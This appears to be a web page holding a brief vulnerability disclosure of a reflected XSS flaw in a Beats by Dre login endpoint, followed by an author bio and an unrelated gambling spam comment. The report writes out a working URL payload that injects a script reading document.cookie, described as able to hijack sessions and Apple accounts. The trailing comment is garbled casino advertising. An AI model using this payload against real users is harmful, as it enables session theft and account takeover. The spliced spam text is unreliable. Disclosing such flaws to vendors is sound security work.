Vulnerability type: Non-Persistent XSS
Affected URL: https://tempo.api.beatsbydre.com/v1/login/?return=%22%3E%3C/form%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
Attack Scenario: An attacker is able to trick an authenticated user into visiting a malicious URL,
which is capable of stealing user's session and take over his apple account.
Best Regards
Amit Kumar
cse@engineer.com
-------------------------------------------------------------------------------------------------------------------------
Preview:
Amit is a Security Engineer acknowledged by Google, Apple, Microsoft, eBay, Intel and other top companies for reporting security issues in their web services.
In both case, results are unpredictable regardless of quantity of} games have been performed, how many of} wins or losses have occurred, the velocity at which a sport is performed, the wager amount or sort, etc. Playing on a gambling machine is taking part in} a sport of probability. 소울카지노 There are often many millions of different potential outcomes of a sport.
ReplyDelete